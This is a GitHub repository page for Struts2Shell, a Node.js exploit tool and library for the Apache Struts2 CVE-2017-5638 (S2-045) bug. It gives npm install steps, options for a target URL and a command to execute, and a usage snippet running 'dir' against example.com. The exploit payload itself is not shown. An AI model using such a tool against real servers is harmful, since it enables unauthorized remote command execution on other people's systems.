Skip to content
/ Struts2Shell Public

An exploit (and library) for CVE-2017-5638 - Apache Struts2 S2-045 bug.

1 star 1 fork Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

jpacora/Struts2Shell

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
bin
bin
 
 
lib
lib
 
 
.gitignore
.gitignore
 
 
README.md
README.md
 
 
_config.yml
_config.yml
 
 
package.json
package.json
 
 
screenshot.png
screenshot.png
 
 

Repository files navigation

Struts2Shell

An exploit (and library) for CVE-2017-5638 - Apache Struts2 S2-045 bug.

Installation

$ npm install -g struts2shell

Installation as Library

$ npm install struts2shell

Command Line Options

-h, --help           output usage information
-V, --version        output the version number
-u, --url [target]   URL to Attack
-c, --cmd [command]  Command to Execute

Usage as Library

var Struts2Shell = require('struts2shell');
Struts2Shell({
	URL: 'http://example.com/some.action',
	CMD: 'dir'
}, function(err, response,body) {
    if(err) throw err;
    console.log(body)
})

Screenshot

Struts2Shell

License

MIT

Free Software, Hell Yeah!

About

An exploit (and library) for CVE-2017-5638 - Apache Struts2 S2-045 bug.

Resources

Readme
Activity

Stars

1 star

Watchers

2 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published

Languages